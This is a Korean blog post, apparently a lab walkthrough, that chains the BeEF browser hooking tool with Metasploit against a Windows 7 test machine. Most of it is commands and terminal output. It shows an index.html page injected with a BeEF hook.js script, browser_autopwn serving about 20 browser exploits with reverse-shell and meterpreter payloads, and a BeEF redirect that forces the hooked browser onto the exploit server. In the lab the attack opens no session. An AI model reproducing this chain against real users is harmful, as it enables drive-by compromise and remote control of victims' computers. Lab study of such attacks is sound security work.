- BeEF + MSF
BeEF는 단지 웹페이지를 조작할 수 있기때문에 공격을 하기엔 제약사항이 많다.
하지만 웹페이지를 통해 MSF가 쉘을 얻는다면 더 강력한 공격을 할 수 있다.
- 사용 시스템
KaliLinux
Windows 7
- 사전 준비
(Win7)
방화벽 모두 내리기
Java 보안 설정에 192.168.27.50 과 192.168.27.50:8080 신뢰사이트 추가
- 실습
(kali)
- BeEF에서 MSF 시작 가능하도록 설정
# vi /usr/share/beef-xss/config.yaml
> metasploit 을 검색후 true 로 변경
# vi /usr/share/beef-xss/extensions/metasploit/config.yaml
|
# # Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # Enable MSF by changing extension:metasploit:enable to true # Then set msf_callback_host to be the public IP of your MSF server # # Ensure you load the xmlrpc interface in Metasploit # msf > load msgrpc ServerHost=IP Pass=abc123 # Please note that the ServerHost parameter must have the same value of host and callback_host variables here below. # Also always use the IP of your machine where MSF is listening. beef: extension: metasploit: name: 'Metasploit' enable: true host: "127.0.0.1" port: 55552 user: "msf" pass: "abc123" ..... |
|
> BeEF에서 MSF 연결할때 사용해야하는 페스워드
[TERM1]
# msfconsole
|
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% % %%%%%%%% %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Save 45% of your time on large engagements with Metasploit Pro Learn more on http://rapid7.com/metasploit =[ metasploit v4.14.10-dev ] + -- --=[ 1639 exploits - 944 auxiliary - 289 post ] + -- --=[ 472 payloads - 40 encoders - 9 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > load msgrpc Pass=abc123 [*] MSGRPC Service: 127.0.0.1:55552 [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc |
|
> msgrpc plugin 로딩
> 이렇게 두면 BeEF에 연결 상태라고 생각하시면 됩니다. ( 끄면 안됩니다. )
[TERM2]
# cd /usr/share/beef-xss
# ./beef -x
|
[20:11:10][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [20:11:10][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha [20:11:10] | Twit: @beefproject [20:11:10] | Site: http://beefproject.com [20:11:10] | Blog: http://blog.beefproject.com [20:11:10] |_ Wiki: https://github.com/beefproject/beef/wiki [20:11:10][*] Project Creator: Wade Alcorn (@WadeAlcorn) [20:11:11][*] Successful connection with Metasploit. [20:11:15][*] Loaded 297 Metasploit exploits. [20:11:15][*] Resetting the database for BeEF. [20:11:16][*] BeEF is loading. Wait a few seconds... [20:11:35][*] 13 extensions enabled. [20:11:35][*] 550 modules enabled. [20:11:35][*] 3 network interfaces were detected. [20:11:35][+] running on network interface: 127.0.0.1 [20:11:35] | Hook URL: http://127.0.0.1:3000/hook.js [20:11:35] |_ UI URL: http://127.0.0.1:3000/ui/panel [20:11:35][+] running on network interface: 192.168.17.50 [20:11:35] | Hook URL: http://192.168.17.50:3000/hook.js [20:11:35] |_ UI URL: http://192.168.17.50:3000/ui/panel [20:11:35][+] running on network interface: 192.168.27.50 [20:11:35] | Hook URL: http://192.168.27.50:3000/hook.js [20:11:35] |_ UI URL: http://192.168.27.50:3000/ui/panel [20:11:35][*] RESTful API key: b76d4aa219fe70bcc93d9a33d78e7eb621ff0a0c [20:11:35][*] HTTP Proxy: http://127.0.0.1:6789 [20:11:35][*] BeEF server started (press control+c to stop) |
|
[TERM3]
- 웹 페이지 설정
# cd /var/www/html
# vi index.html
|
<HTML> <BODY> <CENTER><H1> It works! </H1></CENTER> <script src="http://192.168.27.50:3000/hook.js"></script> <P>This is the default web page for this server.</P> <P>The Web Server software is running but no content has been added, yet.</P> </BODY> </HTML> |
|
# service apache2 restart
# firefox http://192.168.27.50:3000/ui/panel &
ID beef PASS beef
(win7)
크롬에서 192.168.27.50 접속
(kali)
> Module Tree에 Metasploit 이 추가된것을 확인 할 수 있다.
[TERM1]
> msf 를 192.168.27.50:8080 에서 리슨상태로 대기한다. > 사용자가 192.168.27.50:8080으로 접속하면 연결되어 권한을 얻어낸다.
|
msf > search autopwn Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter auxiliary/server/browser_autopwn2 2015-07-05 normal HTTP Client Automatic Exploiter 2 (Browser Autopwn) msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The IP address to use for reverse-connect payloads SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) Auxiliary action: Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits msf auxiliary(browser_autopwn) > set LHOST 192.168.27.50 LHOST => 192.168.27.50 msf auxiliary(browser_autopwn) > set SRVHOST 192.168.27.50 SRVHOST => 192.168.27.50 msf auxiliary(browser_autopwn) > set URIPATH / URIPATH => / msf auxiliary(browser_autopwn) > show options Module options (auxiliary/server/browser_autopwn): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.27.50 yes The IP address to use for reverse-connect payloads SRVHOST 192.168.27.50 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH / no The URI to use for this exploit (default is random) Auxiliary action: Name Description ---- ----------- WebServer Start a bunch of modules and direct clients to appropriate exploits msf auxiliary(browser_autopwn) > exploit [*] Auxiliary module execution completed [*] Setup msf auxiliary(browser_autopwn) > [*] Starting exploit modules on host 192.168.27.50... [*] --- [*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/MjPAFAP [*] Server started. [*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.27.50:8080/wxdukboRudBP [*] Server started. [*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.27.50:8080/tkmLMWLsMFjO [*] Server started. [*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.27.50:8080/UUMAb [*] Server started. [*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/hBja [*] Server started. [*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/RWspycOuBM [*] Server started. [*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/XITF [*] Server started. [*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/lkHbhVMcdc [*] Server started. [*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/EtWgzqAlNAyzc [*] Server started. [*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/XUwe [*] Server started. [*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp [*] Using URL: http://192.168.27.50:8080/ZxkZEfNLNbS [*] Server started. [*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/fXnpV [*] Server started. [*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/FAOhYz [*] Server started. [*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/pKGSUIOr [*] Server started. [*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/gOlEfR [*] Server started. [*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/alsNvIEWeFPP [*] Server started. [*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/uohTp [*] Server started. [*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/QNCmbskzUEE [*] Server started. [*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/gPZL [*] Server started. [*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp [*] Using URL: http://192.168.27.50:8080/TzpobGJFj [*] Server started. [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse TCP handler on 192.168.27.50:3333 [*] Starting the payload handler... [*] Starting handler for java/meterpreter/reverse_tcp on port 7777 [*] Started reverse TCP handler on 192.168.27.50:6666 [*] Started reverse TCP handler on 192.168.27.50:7777 [*] Starting the payload handler... [*] Starting the payload handler... [*] --- Done, found 20 exploit modules [*] Using URL: http://192.168.27.50:8080/ [*] Server started. |
|
- beef에서 192.168.27.50:8080으로 페이지 바꿔버린다. ( 억지로 전송 )
> Browser > Hooked Domain > Redirect Browser URL : http://192.168.27.50:8080
> 192.168.27.50:8080 으로 페이지를 옮긴다.
(win7)
> 자동으로 넘어갔다.
(kali)
[TERM1]
|
[*] Handling '/' [*] Handling '/?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6Q2hyb21lOjYyLjAuMzIwMi44OTo%3d' [*] JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:ko:x86:Chrome:62.0.3202.89: [*] Reporting: {"os.product"=>"Windows 7", "os.language"=>"ko", "os.arch"=>"x86", "os.certainty"=>"0.7"} [*] Responding with 6 exploits [*] Handling '/favicon.ico' [*] 404ing /favicon.ico msf auxiliary(browser_autopwn) > sessions Active sessions =============== No active sessions. |
|
> 연결이 된거 같아 보이나 sessions 으로 확인 해보았을때 연결된것이 없다.
-> 과거에는 잘 된것으로보아 크롬 업데이트가 이루어지고 나서 버그가 고쳐진것 같다.
-> 크롬은 전 버전에 대해 제공하고 있지 않아 구하기 힘들며 다른 경로로 구하더라도 자동 업데이트 되어버린다..
-> metasploit 이 업데이트된 크롬을 다시 뚫을 수 있도록 업데이트 되어야만 가능할 것 같다..
-> 정상적인 경우라면 sessions에 windows7 이 연결되어 sessions -i 1 로 연결하면 바로 권한을 가진다.
'Security > 정보 수집' 카테고리의 다른 글
| [종합] Fake Site 구성하기 (0) | 2017.11.13 |
|---|---|
| Fake Update Site 구축 (0) | 2017.11.13 |
| 웹 브라우저 해킹 ( BeEF XSS ) (0) | 2017.11.13 |
| Armitage 사용하기 (0) | 2017.11.12 |
| setoolkit을 이용한 Java Applet Attack (0) | 2017.11.12 |
